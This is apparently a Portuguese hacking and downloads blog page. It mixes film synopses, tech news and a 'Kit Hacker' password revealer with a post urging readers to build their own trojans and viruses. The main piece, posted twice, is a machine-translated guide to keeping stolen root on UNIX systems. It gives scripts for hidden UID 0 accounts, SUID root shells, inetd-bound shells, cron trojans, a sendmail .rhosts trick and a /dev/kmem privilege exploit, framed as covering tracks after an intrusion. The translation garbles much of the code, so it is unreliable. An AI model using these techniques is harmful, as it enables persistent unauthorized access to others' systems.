publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade

ICONES DE VARIAS ESPECIES SÃO MAIS DE 500



Deixe seu Comentário:
Sem comentários »

Um monte de apostilas  é so voce baixar e procurar o que quer tem um pouco de tudo .

Deixe seu Comentário:
Sem comentários »
Categorias:

Tudo oque voce precisa para começar a programar em Delphi


Este download contem 




Apostilas,
Cursos,
Exemplos,
Codigos 
Fontes,
Dicas e mais 


Baixe exercite e começe a desenvolver seus proprios trojan,virus ,backdoors,snifes etc



Deixe seu Comentário:
Sem comentários »
Categorias:

MCel lança novos pacotes de internet móvel pré-pago

Maputo, 30 Mar. (AIM) – A operadora pública moçambicana de telefonia móvel, a mCel, anunciou a introdução, a partir de hoje, de novos pacotes de Internet móvel pré - pago.

De acordo com Salvador Adriano, Presidente do Conselho de Administração da mCel, os novos serviços são baseados no tempo de uso, ao invés do tradicional uso baseado em quantidade de dados utilizados (Megabytes).

Segundo Adriano, que falava na cerimonia de lançamento dos novos pacotes, com este novo produto, os clientes da mCel terão “total” transparência, controlo e previsibilidade no uso da Internet, uma vez que, irão, sem necessidade de assinatura de contratos, 'adquirir tempo de uso'.

“A oferta destes pacotes é mais uma novidade absoluta no mercado e representa o nosso cometimento na busca permanente de soluções que satisfaçam as necessidades dos nossos clientes, trazendo maior produtividade para as empresas moçambicanas, e reduzindo o vazio digital ainda prevalecente no nosso País”, frisou aquele gestor.

Esta iniciativa, que tem por objectivo atrair e incentivar o consumo da Internet em larga escala, enquadra-se na estratégia para tornar mais acessível e menos oneroso o uso da Internet pelos vários segmentos do mercado, com enfoque para as pequenas e médias empresas, jovens estudantes, profissionais e ainda pessoas de baixa e média renda.

A mCel conta com cerca de quatro milhões de clientes em todo o País, o que representa uma quota de mercado estimada em 66 por cento.

Esta operadora cobre 120 distritos dos 128 existentes no país, através de cerca de 900 antenas cobrindo actualmente cerca de 62 por cento do território geográfico e acima de 83 por cento da população moçambicana.

Deixe seu Comentário:
Sem comentários »
Categorias:

7Tweak

Sinopse: Programa para limpeza, ajuste e otimização do sistema operacional Windows 7. Com 7Tweak pode ser realizada a limpeza e fazer backup de seu sistema de registro, pesquisar e excluir arquivos desnecessários e limpar a lista dos últimos arquivos utilizados no sistema e vários aplicativos do usuário, Desfragmentar. Existe a possibilidade de mexer nas configurações de segurança do sistema, incluindo opções para o UAC (User Account Control) e o programa Windows Mail. Além disso, o programa tem uma seção para ativar / desativar os efeitos visuais, configurações detalhadas de todos os elementos do menu Iniciar.

botao-baixar

Deixe seu Comentário:
Sem comentários »

Teste de Sexo


Fiz este teste e ele é tao eficiente que fiquei parvo olhando para o resultado foi como se eles tivessem lido minha mente faça e veja os resultados.Faça o teste quem sabe com ele voce não descubra o que atormenta tuas relaões.



Deixe seu Comentário:
Sem comentários »
Categorias:

Teste de Firewall

Segundo bons métodos de segurança,um dos abitos nos quais proprietarios admin etc de computadores devem fazer é fazer testes periodicamente e aqui esta uma dica para voce testar seu firewall

va para esse site Entrar
Clique em proceede
Depois clique em All Cervice Ports
agora espere que ele fará o teste e teras o resultado no fim da pagina tera la um link tipo assim text Summary para voce  ver o relatorio completo do teste.


Voce pode tambem fazer um teste usando o Eicar embora sendo um teste desatualizado e nos dias de hoje considerado ineficiente voce pode testar ele nem. 


Um ponto muito importante é voce acompanhar os testes feitos por especialistas no assunto veja o teste feito pela AV Comparatives Baixar teste ai voce vai decidir oque fazer.
Voce pode baixar o antivirus considerado como melhor nesses ultimos teste feitos usando o seguinte Link
Se quiseres saber oque faço para manter meus pcs seguros me contacte no seguinte msn cientistamito@ymail.com
Deixe seu Comentário:
Sem comentários »
Categorias:
O imesh é um soft muito bom p conversas vale a pena testar p ver n que dá.


Deixe seu Comentário:
Sem comentários »


      

Os programas em si não hackeiam, eles simplesmente revelam informações secretas dos computadores onde foram instalados. Ou seja, a pessoa precisa ter digitado e entrado no Orkut, MSN e Email com sucesso no computador onde está instalado o Kit Hacker para você poder ler o password.
Teste tentar ver sua senha do Orkut, seu login e senha do MSN. Você terá se raqueado!.

------------==============-----------
Deixe seu Comentário:
Sem comentários »
Categorias:

Sinopse: Por razões desconhecidas, o núcleo da Terra parou de girar e o campo eletromagnético do planeta começa a se deteriorar rapidamente. A vida em todo o globo muda dramaticamente. Em Boston, 32 pessoas com marca-passos, todas numa área de dez quarteirões, morrem inesperadamente. Em São Francisco, a ponte Golden Gate cai, matando centenas de pessoas. Na praça Trafalgar, em Londres, bandos de pombos perdem a noção de navegação e se jogam contra os transeuntes e contra os pára-brisas dos carros fazendo com que os motoristas percam o controle dos veículos. Em Roma, milhares de turistas observam uma supertempestade elétrica transformar em pó o Coliseu. Tentando solucionar a crise, membros do governo e das forças armadas dos Estados Unidos convocam o geofísico Josh Keyes e uma equipe dos mais talentosos cientistas do mundo para fazerem uma viagem ao núcleo da Terra numa nave especial pilotada pelos “terranautas” major Rebecca “Beck” Childs e o comandannte Robert Iverson. A missão deles é detonar uma bomba nuclear para reativar o núcleo — e salvar o mundo da destruição

Deixe seu Comentário:
Sem comentários »
Categorias:

Eu, Robô


Em 2035 a existência de robôs é algo corriqueiro, sendo usados constantemente como empregados e assistentes dos humanos. Os robôs possuem um código de programação chamado Lei dos Robóticos, que impede que façam mal a um ser humano. Esta lei parece ter sido quebrada quando o Dr. Miles aparece morto e o principal suspeito de ter cometido o crime é justamente o robô Sonny. Caso Sonny realmente seja o culpado, a possibilidade dos robôs terem encontrado um meio de quebrarem a Lei dos Robóticos pode permitir que eles dominem o planeta, já que nada mais poderia impedi-los de subjugar os seres humanos. Para investigar o caso é chamado o detetive Del Spooner (Will Smith) que, com a ajuda da Dra. Susan Calvin (Bridget Monayhan), precisam desvendar o que realmente aconteceu.

Deixe seu Comentário:
Sem comentários »
Categorias:

WarGames





Tudo começa quando um jovem hacker informático consegue introduzir-se numa rede restrita de jogos ´on-line`. O que não podia imaginar é que essa rede, na realidade, é um sistema de defesa nacional para descobrir células terroristas. a partir desse momento, ele transforma-se num alvo dessa organização. E se quer sair com vida de toda esta aventura, terá de utilizar todos os seus conhecimentos...e ter ainda um pouco de sorte.

Deixe seu Comentário:
Sem comentários »
Categorias:

Matrix no Windows XP

Deixe seu Comentário:
Sem comentários »
Categorias:

Incrível montagem 3D "Dinossauros"

Deixe seu Comentário:
Sem comentários »
Categorias:

RealHideIP Real Hide IP v3.5.7.2

Você está ciente que o seu endereço IP é exposto a cada vez que você visita um site e vários sites e hackers usam endereços IP para monitorar o seu endereço de casa e outras informações pessoais? Hide Real IP permite a você navegar anonimamente, manter o seu endereço IP oculto, proteger suas informações pessoais contra hackers e fornece criptografia completa de suas atividades online, tudo com um simples clique de um botão.


Principais Características

- Hide Your IP Address Real

- Anonymous Web Surfing

- Protege sua identidade contra hackers

- Un-ban-se em fóruns ou sites restritos

- Evite sites que rastreiam suas atividades online
Deixe seu Comentário:
Sem comentários »

Extraindo Fotos de temas Wind7

Deixe seu Comentário:
Sem comentários »
Categorias:

BackDoor ( Porta das Trazeiras )

Ok ..... Você foi para ele durante toda a noite. Tentar todas as façanhas que você pode pensar. O sistema parece apertado. O sistema parece apertado!
O sistema * * é apertado. Você já tentou de tudo. Passwds Padrão, passwds guessable, fraquezas NIS, NFS buracos, incorreto
permissões, as condições de corrida, explora SUID, bugs Sendmail, e assim por diante ... Nada. WAIT! O que é isso?!!? A "#"?? Finalmente!
Após a labuta interminável aparente, você conseguiu roubar raiz. E agora? Como você se apega a essa preciosa super-usuário
privilégio de ter trabalhado tão duramente para conseguir ....?

Este artigo destina-se a mostrar-lhe como prender raiz uma vez que você tem. Ele é destinado a hackers e administradores.
De uma perspectiva de "hacking", é óbvio que bom este papel você vai fazer. Admin pode igualmente beneficiar deste papel. Sempre
quero saber como hacker maldito que sempre consegue aparecer, mesmo quando você pensa que ele totalmente erradicada de seu
sistema?
Esta lista não é de forma abrangente. Há tantas maneiras de deixar backdoors em um computador UNIX, pois há
formas em um.

Antemão

Conheça a localização dos arquivos críticos do sistema. Isto deveria ser óbvio (Se você não pode listar qualquer um dos topo de sua cabeça, pare de ler
Agora, pegue um livro sobre UNIX, lê-lo, em seguida, voltar para mim ...). Familiaridade com os formatos de arquivo passwd (incluindo a área geral 7
formato, as convenções de nomenclatura específica do sistema, mecanismos de sombreamento, etc ..). Vi Know. Muitos sistemas não terá os
robusta do usuário, editores de ambiente, como o Pico e Emacs. Vi também é bastante útil para a necessidade de procurar rapidamente e editar um arquivo grande. Se
você está se conectando remotamente (via dial-up/telnet/rlogin/whatver) é sempre bom ter um programa de terminal robusto que tem um
Nice, buffer scrollback FAT. Isso será útil se você quer cortar e colar código, rc, shell scripts, etc ..

O permenance desses backdoors vai depender completamente no saavy técnico do administrador. O experiente e
administrador hábil será sábio para muitos (se não todas) dessas backdoors. Mas, se você conseguiu roubar raiz, é provável que o
admin não é tão qualificados (ou até à data em relatórios de erros), como ela deve ser, e muitas dessas portas pode ser posto em prática há algum tempo
para vir. Uma coisa importante a ter em conta, é o fato de que, se você pode cobri-lo faixas durante o intervalo inicial de dentro, ninguém será
procurando portas traseiras.



A Overt

[1] Adicione uma conta UID 0 para o arquivo passwd. Esta é provavelmente a mais óbvia e rapidamente descobriu método de Rentry. Ele
voa uma bandeira vermelha para o administrador, dizendo "Nós estamos sob ataque !!!". Se você deve fazer isso, meu conselho é que não basta
preceder ou anexá-lo. Qualquer causalmente examinando o arquivo passwd vai ver isso. Assim, porque não furá-la no meio ...

/ bin / csh
# Insere uma conta UID 0 para o meio do arquivo passwd.
# Não é provável que uma maneira de fazer isso em 1 / 2 de uma linha de AWK e SED. Oh well.
Daemon9@netcom.com #

conjunto lineCount = `wc-l / etc / passwd`
CD # fazer isso em casa.
cp / etc / passwd. / temppass # Segurança em primeiro lugar.
echo $ passwd tem lineCount [1] linhas.
@ LineCount [1] / = 2
@ LineCount [1] + = 1 # só queremos arquivos 2 temp
echo Criando dois arquivos, $ lineCount [1] linhas cada \ (ou seja, cerca de \).
split - $ lineCount [1]. / temppass # string passwd opcional
echo "EvilUser:: 0:0: Mr. Sinister: / home / sweet / home: / bin / csh">>. / XAA
cat. / xab>>. / XAA
mv. / XAA / etc / passwd
chmod 644 / etc / passwd # ou seja lá o que foi previamente
rm. / xa *. / temppass
Feito eco ...

NUNCA, NUNCA, altere a senha de root. As razões são óbvias.

[2] No mesmo sentido, activar uma conta desactivada como UID 0, tais como a sincronização. Ou, talvez, uma conta somwhere enterrado no fundo do
passwd foi abandonado, e desativada pelo administrador do sistema. Mude seu UID a 0 (e remover o '*' a partir da segunda
campo).

[3] Deixar um shell de root SUID em / tmp.

/ bin / sh
# Everyone's favorite ...

cp / bin / csh / tmp / .evilnaughtyshell # Não é nome que ...
chmod 4755 / tmp / .evilnaughtyshell

Muitos sistemas de executar tarefas cron para limpar / tmp noturno. A maioria dos sistemas clean / tmp em cima de um reboot. Muitos sistemas têm / tmp montado
para desautorizar programas SUID de execução. Você pode mudar tudo isso, mas se o sistema começa a encher, as pessoas podem
aviso ... mas, hey, isto * é * a seção aberta ....). Não vou detalhar as mudanças necessárias, pois eles podem ser completamente sistema
específicos. Saída / var / spool / cron / crontabs / root e / etc / fstab.



O Veiled

[4] O super-arquivo de configuração do servidor não é o primeiro lugar um sysadmin vai olhar, então porque não colocar um lá? Primeiro, alguns
info background: O servidor de Internet (/ etc / inetd) atende a pedidos de conexão em portas TCP e UDP e gera o
programa apropriado (geralmente um servidor) quando um pedido de conexão chega. O formato do arquivo / inetd.conf / etc é simples. Típico
linhas de aparência:

(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root / usr / etc / ftpd ftpd
talk dgram udp wait root / usr / etc / ntalkd ntalkd

Field (1) é o nome do servidor que deve aparecer no arquivo / etc / services. Isto diz-inetd que procurar no arquivo / etc / services para determinar
qual a porta que deve associar o nome do programa com. (2) diz inetd qual o tipo de conexão de soquete o daemon irá esperar.
TCP usa córregos, e utiliza datagramas UDP. Campo (3) é o campo de protocolo, que é um dos dois protocolos de transporte, o TCP
ou UDP. Campo (4) especifica se ou não o daemon é iterativo ou simultâneas. A bandeira esperar 'indica que o servidor irá
ligação de um processo e fazer todas as conexões subseqüentes esperar. "Nowait" significa que o servidor irá aceitar uma conexão, uma ova
processo filho para tratar da ligação, e depois voltar a dormir, à espera de novas conexões. Campo (5) é o usuário (ou mais
inportantly, o UID) que o servidor seja executado. (6) é o programa para ser executado quando uma conexão chega, e (7) é o real
(comando e argumentos opcionais). Se o programa é trivial (geralmente não requer a interação do usuário) inetd pode manipulá-lo internamente.
Isto é feito com uma "bandeira interna" nos campos (6) e (7).
Assim, para instalar um backdoor acessível, escolher um serviço que não é usada frequentemente, e substituir o daemon que normalmente iriam lidar com ela
com outra coisa. Um programa que cria um escudo SUID root, um programa que adiciona uma conta de root para você no arquivo / etc / passwd
arquivos, etc ..
Para a insinuação-danificada, tente o seguinte:

Abra o arquivo / etc / inetd.conf em um editor disponível. Encontre a linha que lê:


daytime stream tcp nowait root interno

e alterá-lo para:

daytime stream tcp nowait / bin / sh sh-i.

Agora você precisa reiniciar o / etc / inetd assim ele vai reler o arquivo de configuração. Cabe a você como você gostaria de fazer isso. Você pode matar e
reiniciar o processo (kill -9, / usr / sbin / inetd ou / usr / etc / inetd) que interuppt conexões de rede ALL (por isso é uma boa idéia
Para fazer isso fora as horas de pico).

[5] Uma opção para comprometer um serviço bem conhecido seria instalar um novo, que executa um programa de sua escolha. Um
solução simples é criar um shell executa o backdoor semelhante ao anterior. Você precisa certificar-se da entrada aparece no
/ etc / serviços, bem como no arquivo / etc / inetd.conf. O formato do arquivo / etc / services é simples:

(1) (2) / (3) (4)
smtp 25/tcp mail

Field (1) é o serviço de campo (2) é o número da porta, (3) é o tipo de protocolo do serviço de espera, e (4) é o nome comum
associado ao serviço. Por exemplo, adicione esta linha ao arquivo / etc / serviços:

22/tcp mal mal

e esta linha ao arquivo / etc / inetd.conf:

stream tcp nowait mal / bin / sh sh-i

Reinicie o inetd como antes.

Nota: Potencialmente, estes são um backdoors muito poderoso. Eles não só oferecem Rentry local a partir de qualquer consideração sobre o sistema,
eles oferecem Rentry de qualquer conta * * * em * qualquer computador na Internet.

[6] Cron-base de Tróia I Cron é uma ferramenta de administração maravilhoso sistema. É também uma ferramenta maravilhosa para backdoors, desde raiz
crontab irá, assim, ser executado como root ... Novamente, dependendo do nível de experiência do administrador de sistemas (e da aplicação), esta
backdoor pode ou não passado. / var / spool / cron / crontabs / raiz é onde a lista de raiz para crontabs geralmente está localizado. Aqui, você tem
várias opções. Vou listar uma só alguns, como o cron-backdoors baseados são limitadas apenas pela sua imaginação. Cron é o daemon do relógio.
É uma ferramenta para automaticamente executar comandos em datas e horários especificados. Crontab é o comando usado para adicionar, remover,
ou ver as suas entradas crontab. É tão fácil de editar manualmente o arquivo / var / spool / crontab arquivo / root como é para usar o crontab. A crontab
entrada possui seis campos:

(1) (2) (3) (4) (5) (6)
0 0 * * 1 / usr / bin / updatedb

Fields (1) - (5) são as seguintes: minutos (0-59), horas (0-23), dia do mês (1-31) meses do ano (1-12), dia da semana
(0-6). Campo (6) é o comando (ou script) para executar. O shell script acima é executado nas segundas-feiras. Para explorar o cron,
simplesmente adicionar uma entrada em / var / spool / crontab / root. Por exemplo: Você pode ter um cronjob que será executado por dia e olhar no
arquivo / etc / passwd para a 0 UID conta que adicionou anteriormente, e adicionar-lhe se ele estiver ausente, ou não fazer nada em contrário (que não pode
ser uma má idéia para realmente inserir * * este código em um shell script já está instalado crontab entrada, para continuar a ofuscar o seu
intenções obscuros). Adicione esta linha ao / var / spool / crontab / root:

0 0 * * * / usr / bin / trojancode

Este é o shell script:

/ bin / csh
# Será que nossa eviluser ainda sobre o sistema? Vamos ter certeza que ele é.
daemon9@netcom.com #

conjunto evilflag = (eviluser `grep / etc / passwd`)


if ($ # evilflag == 0) then # Será que ele existe?

conjunto lineCount = `wc-l / etc / passwd`
CD # fazer isso em casa.
cp / etc / passwd. / temppass # Segurança em primeiro lugar.
@ LineCount [1] / = 2
@ LineCount [1] + = 1 # só queremos arquivos 2 temp
split - $ lineCount [1]. / temppass # string passwd opcional
echo "EvilUser:: 0:0: Mr. Sinister: / home / sweet / home: / bin / csh">>. / XAA
cat. / xab>>. / XAA
mv. / XAA / etc / passwd
chmod 644 / etc / passwd # ou seja lá o que foi previamente
rm. / xa *. / temppass
Feito eco ...
diferente
endif

[7] Cron-base de Tróia II. Este foi trazido à minha atenção por nosso próprio Mr. Zippy. Para isso, você precisa de uma cópia do
/ etc / passwd escondida em algum lugar. Neste arquivo oculto passwd (chamá-lo de / var / spool / mail / .sneaky) nós temos, mas uma entrada, uma raiz
conta com um passwd de sua escolha. Corremos um cronjob que, todas as manhãs, às 2:30 horas (manhã ou qualquer outro), salvo uma
cópia do arquivo real / etc / passwd, e instalar este um trojan que o arquivo real / etc / passwd de um minuto (sincronizar amostras!).
Qualquer utilizador normal ou o processo de tentar fazer o login ou acessar o arquivo / etc / passwd seria um erro, mas um minuto depois, tudo
seria ok. Adicione esta linha ao arquivo do root crontab:


29 2 * * * / usr / bin / sneakysneaky_passwd

tenha certeza que isto existe:

# echo "root: 1234567890123:0:0: Operador: /: / bin / csh"> / var / spool / mail / .sneaky

e este é o shell script simples:

/ bin / csh
# Instalar o trojan / etc / passwd de um minuto
daemon9@netcom.com #

cp / etc / passwd / etc / .temppass
cp / var / spool / mail / .sneaky / etc / passwd
sleep 60
mv / etc / .temppass / etc / passwd

[8] trojan código compilado. Idéia simples. Em vez de um shell script, tem algum código C agradável para ofuscar os efeitos. Aqui está.
Certifique-se que ele é executado como root. Nome inócuos algo. Escondê-la bem.

/ * Um pouco de tróia para criar um shell de root SUID, se o argumento é bom
dado. Código C, ao invés de escudo para ocultar óbvia é efeitos. * /
/ * Daemon9@netcom.com * /

# include

# define KEYWORD "Indústria3"
# define BUFFERSIZE 10

int main (argc, argv)
int argc;
char * argv []; (

int i = 0;

if (argv [1]) (/ * temos um argumento, é a palavra-chave? * /

if (! strcmp ((palavra-chave, argv [1 ]))){

/ * Esta é a parte trojan. * /
system ( "cp / bin / csh / bin/.swp121");
system ( "chown root / bin/.swp121");
system ( "chmod 4755 / bin/.swp121");
)
)
/ * Coloque o seu sistema possivelmente trojan específico
mensagens aqui * /
/ * Vamos ver como nós estamos fazendo alguma coisa ... * /
printf ( "bitmap Sychronizing registros de imagem.");
/ * System ( "ls-alR /> & / dev / null> / dev / null &"); * /
for (; i <10; i + +) ( fprintf (stderr ,"."); sono (1); ) printf ( "nDone \. \ n"); return (0); ) / * End main * / [9] O arquivo de aliases do sendmail. O arquivo de aliases do sendmail permite e-mail enviado para um usuário específico para expandir a vários utilizadores, ou talvez o tubo de saída para um programa. Mais conhecido deles é o trojan alias uudecode. Basta adicionar a linha: "Decode:" | / usr / bin / uudecode " ao arquivo / etc / aliases arquivo. Normalmente, você iria em seguida, criar uma uuencoded. Rhosts com o caminho completo embutido. #! / bin / csh # Create a nossa. Rhosts. Observação: este será a saída para stdout. echo "+ +"> tmpfile
/ usr / bin tmpfile / uuencode / root / .rhosts

Telnet Próximo ao local desejado, porta 25. Basta FakeMail para decodificar e utilizar o corpo como tema, a versão do uuencoded
. rhosts. Para um forro de um (não falsificou, no entanto) fazer isso:

% echo "+ +" | / usr / bin / uuencode / root / .rhosts | decode@target.com mail

Você pode ser tão criativo como você deseja, neste caso. Você pode configurar um alias que, quando enviado para, será executado um programa de sua
escolha. Muitos dos scripts anteriores e métodos podem ser empregados aqui.



A Covert

[10] Trojan em programas de código comum. Este é um método bastante sorrateiras que é realmente apenas detectável por programas como o Tripwire.
A idéia é simples: inserir código trojan na fonte de um programa comumente utilizados. Alguns dos programas mais úteis para nós neste
caso são su, login e passwd porque já executado SUID root, e não necessitam de permissão de alteração. Abaixo estão algumas
Exemplos geral do que você gostaria de fazer, depois de obter o código fonte correta para o sabor especial do UNIX você
são Backdooring. (Nota: Esta pode não ser sempre possível, como alguns vendedores UNIX não são tão generosos com o seu código fonte.)
Desde que o código é muito longa e diferente de muitos sabores, vou apenas incluir psuedo base-code:

obter a entrada;
Se a entrada é bandeira especial codificado, spawn trojan mal;
else if entrada é válida, continue;
else parar com o erro;
...

Não é complexo ou difícil. Trojans desta natureza pode ser feito em menos de 10 linhas de código adicionais.



The Esoteric

[11] / dev / kmem explorar. Ele representa o virtual do sistema. Desde que o kernel mantém os seus parâmetros na memória, é possível
para modificar a memória da máquina para alterar o UID de seus processos. Para fazer isso requer que / dev / kmem de leitura / gravação
permissão. As seguintes etapas são executadas: Abra o dispositivo / dev / kmem, buscar a sua página na memória, substituirá o UID
o processo atual, em seguida, gerar um csh, que vai herdar esse UID. O seguinte programa faz exatamente isso.

/ * Se / kmem é a leitura e gravação, esse programa vai mudar o usuário
UID e GID de 0. * /
/ * Este código foi publicado originalmente no "segurança UNIX: Um tutorial prático"
com algumas modificações por daemon9@netcom.com * /

# include
# include
# include
# include
# include
# include
# include

# define KEYWORD "nomenclature1"

struct Userpage usuário;
longa endereço () userlocation,;

int main (argc, argv, envp)
int argc;
char * argv [], * envp []; (

count, FD;
tempo em que, lseek ();

if (argv [1]) (/ * temos um argumento, é a palavra-chave? * /
if (! strcmp ((palavra-chave, argv [1 ]))){
fd = (open ( "/ dev / kmem", O_RDWR);

if (fd <0) (
printf ( "Não é possível ler ou escrever para / dev / kmem \ n");
perror (argv);
saída (10);
)

Endereço userlocation = ();
onde = (lseek (fd, userlocation, 0);

if (onde! = userlocation) (
printf ( "Não é possível procurar a página do usuário \ n");
perror (argv);
saída (20);
)

count = read (fd, & Userpage, sizeof (user));

if (count! = sizeof (user)) (
printf ( "Não é possível ler a página do usuário \ n");
perror (argv);
saída (30);
)

printf ( "Current UID:% d \ n", userpage.u_ruid);
printf ( "Current GID:% d \ n", userpage.g_ruid);

userpage.u_ruid = 0;
userpage.u_rgid = 0;

onde = lseek (fd, userlocation, 0);

if (onde! = userlocation) (
printf ( "Não é possível procurar a página do usuário \ n");
perror (argv);
saída (40);
)

write (fd, & Userpage, ((char *) & (userpage.u_procp ))-(( char *) & Userpage));

execle ( "/ bin / csh", "/ bin / csh", "-i", (char *) 0, envp);
)
)

) / * End main * /

# include
# include
# include

# define LNULL ((LDFILE *) 0)

longa endereço () (

LDFILE objeto *;
Símbolo SYMENT;
idx tempo = 0;

ldopen objeto = ( "/ Unix", LNULL);

if (object!) (
fprintf (stderr, "Can't open / Unix. \ n");
saída (50);
)

for (; objeto ldtbread (, idx, e símbolo) == SUCCESS; idx + +) (
if (strcmp! ( "_u", objeto (ldgetname, símbolo &))) (
fprintf (stdout, "página de usuário está em 0x% 8.8X \ n", symbol.n_value);
objeto (ldclose);
return (symbol.n_value);
)
)

tabela de símbolos fprintf (stderr, "Can't read in / Unix. \ n");
saída (60);
)

[12] Desde que o código anterior requer / dev / kmem mundo para ser acessível, e isso não é provável que um evento natural, temos de tomar
cuidado com isso. Meu conselho é escrever um script semelhante ao que em [7] que vai mudar as permissões em / dev / kmem para um
discreta quantidade de tempo (digamos 5 minutos) e, em seguida, restaurar as permissões originais. Você pode adicionar essa fonte para a fonte em [7]:

chmod 666 / dev / kmem
sleep 300 # soneca de 5 minutos
chmod 600 / dev / kmem # Ou seja lá o que era antes
Deixe seu Comentário:
Sem comentários »
Categorias:

Microsoft condenada em US$ 105,8 mi por violar patentes

Os tribunais norte americanos condenaram a Microsoft  a pagar uma indenização de 105,8 milhões de dólares, cerca de 77 milhões de euros, por violação de duas patentes pertencentes a uma empresa especializada em segurança nas comunicações.

De acordo com a decisão do tribunal do Texas, que ficou conhecida após um julgamento que se arrastou ao longo de uma semana, a gigante de Redmond terá usado indevidamente tecnologia para criação de redes privadas virtuais (VPN - Virtual Private Network) patenteada pela VirnetX. Segundo a informação avançada pelo advogado da VirtnetX, o montante fixado resulta da violação de duas patentes, cujos danos foram avaliados em 71,75 milhões de dólares (52 milhões de euros) para uma, e 34 milhões de dólares (25 milhões de euros) para outra.

Em declaração oficial, um porta-voz da Microsoft afirma estar "desapontado" com a decisão judicial e diz que a empresa vai recorrer da sentença, alegando que as provas apresentadas mostram que a Microsoft não infringiu as patentes e que estas são inválidas.

De acordo com o seu representante legal, citado por vários meios de comunicação internacionais, a VirnetX está "muito feliz" com o veredicto da ação e espera que esta sirva para mostrar aos infratores de patentes que serão responsabilizados por usarem indevidamente e em proveito próprio o "trabalho árduo dos outros".

Deixe seu Comentário:
Sem comentários »
Categorias:

BackDoor ( Porta das Trazeiras )

Ok ..... Você foi para ele durante toda a noite. Tentar todas as façanhas que você pode pensar. O sistema parece apertado. O sistema parece apertado. O sistema * * é apertado. Você já tentou de tudo. Passwds Padrão, passwds guessable, fraquezas NIS, NFS buracos, incorreto permissões, as condições de corrida, explora SUID, bugs Sendmail, e assim por diante ... Nada. WAIT! O que é isso?!!? A "#"?? Finalmente! Após a labuta interminável aparente, você conseguiu roubar raiz. E agora? Como você se apega a essa preciosa super-usuário privilégio de ter trabalhado tão duramente para conseguir ....?
Este artigo destina-se a mostrar-lhe como prender raiz uma vez que você tem. Ele é destinado a hackers e administradores. De uma perspectiva de "hacking", é óbvio que bom este papel você vai fazer. Admin pode igualmente beneficiar deste papel. Sempre quero saber como hacker maldito que sempre consegue aparecer, mesmo quando você pensa que ele totalmente erradicada de seu sistema? Esta lista não é de forma abrangente. Há tantas maneiras de deixar backdoors em um computador UNIX, pois há formas em um.
Antemão
Conheça a localização dos arquivos críticos do sistema. Isto deveria ser óbvio (Se você não pode listar qualquer um dos topo de sua cabeça, pare de ler Agora, pegue um livro sobre UNIX, lê-lo, em seguida, voltar para mim ...). Familiaridade com os formatos de arquivo passwd (incluindo a área geral 7 formato, as convenções de nomenclatura específica do sistema, mecanismos de sombreamento, etc ..). Vi Know. Muitos sistemas não terá os robusta do usuário, editores de ambiente, como o Pico e Emacs. Vi também é bastante útil para a necessidade de procurar rapidamente e editar um arquivo grande. Se você está se conectando remotamente (via dial-up/telnet/rlogin/whatver) é sempre bom ter um programa de terminal robusto que tem um Nice, buffer scrollback FAT. Isso será útil se você quer cortar e colar código, rc, shell scripts, etc ..
O permenance desses backdoors vai depender completamente no saavy técnico do administrador. O experiente e administrador hábil será sábio para muitos (se não todas) dessas backdoors. Mas, se você conseguiu roubar raiz, é provável que o admin não é tão qualificados (ou até à data em relatórios de erros), como ela deve ser, e muitas dessas portas pode ser posto em prática há algum tempo para vir. Uma coisa importante a ter em conta, é o fato de que, se você pode cobri-lo faixas durante o intervalo inicial de dentro, ninguém será procurando portas traseiras.


A Overt
[1] Adicione uma conta UID 0 para o arquivo passwd. Esta é provavelmente a mais óbvia e rapidamente descobriu método de Rentry. Ele voa uma bandeira vermelha para o administrador, dizendo "Nós estamos sob ataque !!!". Se você deve fazer isso, meu conselho é que não basta preceder ou anexá-lo. Qualquer causalmente examinando o arquivo passwd vai ver isso. Assim, porque não furá-la no meio ...
/ bin / csh # Insere uma conta UID 0 para o meio do arquivo passwd. # Não é provável que uma maneira de fazer isso em 1 / 2 de uma linha de AWK e SED. Oh well. Daemon9@netcom.com #
conjunto lineCount = `wc-l / etc / passwd` CD # fazer isso em casa. cp / etc / passwd. / temppass # Segurança em primeiro lugar. echo $ passwd tem lineCount [1] linhas. @ LineCount [1] / = 2 @ LineCount [1] + = 1 # só queremos arquivos 2 temp echo Criando dois arquivos, $ lineCount [1] linhas cada \ (ou seja, cerca de \). split - $ lineCount [1]. / temppass # string passwd opcional echo "EvilUser:: 0:0: Mr. Sinister: / home / sweet / home: / bin / csh">>. / XAA cat. / xab>>. / XAA mv. / XAA / etc / passwd chmod 644 / etc / passwd # ou seja lá o que foi previamente rm. / xa *. / temppass Feito eco ...
NUNCA, NUNCA, altere a senha de root. As razões são óbvias.
[2] No mesmo sentido, activar uma conta desactivada como UID 0, tais como a sincronização. Ou, talvez, uma conta somwhere enterrado no fundo do passwd foi abandonado, e desativada pelo administrador do sistema. Mude seu UID a 0 (e remover o '*' a partir da segunda campo).
[3] Deixar um shell de root SUID em / tmp.
/ bin / sh # Everyone's favorite ...
cp / bin / csh / tmp / .evilnaughtyshell # Não é nome que ... chmod 4755 / tmp / .evilnaughtyshell
Muitos sistemas de executar tarefas cron para limpar / tmp noturno. A maioria dos sistemas clean / tmp em cima de um reboot. Muitos sistemas têm / tmp montado para desautorizar programas SUID de execução. Você pode mudar tudo isso, mas se o sistema começa a encher, as pessoas podem aviso ... mas, hey, isto * é * a seção aberta ....). Não vou detalhar as mudanças necessárias, pois eles podem ser completamente sistema específicos. Saída / var / spool / cron / crontabs / root e / etc / fstab.


O Veiled
[4] O super-arquivo de configuração do servidor não é o primeiro lugar um sysadmin vai olhar, então porque não colocar um lá? Primeiro, alguns info background: O servidor de Internet (/ etc / inetd) atende a pedidos de conexão em portas TCP e UDP e gera o programa apropriado (geralmente um servidor) quando um pedido de conexão chega. O formato do arquivo / inetd.conf / etc é simples. Típico linhas de aparência:
(1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root / usr / etc / ftpd ftpd talk dgram udp wait root / usr / etc / ntalkd ntalkd
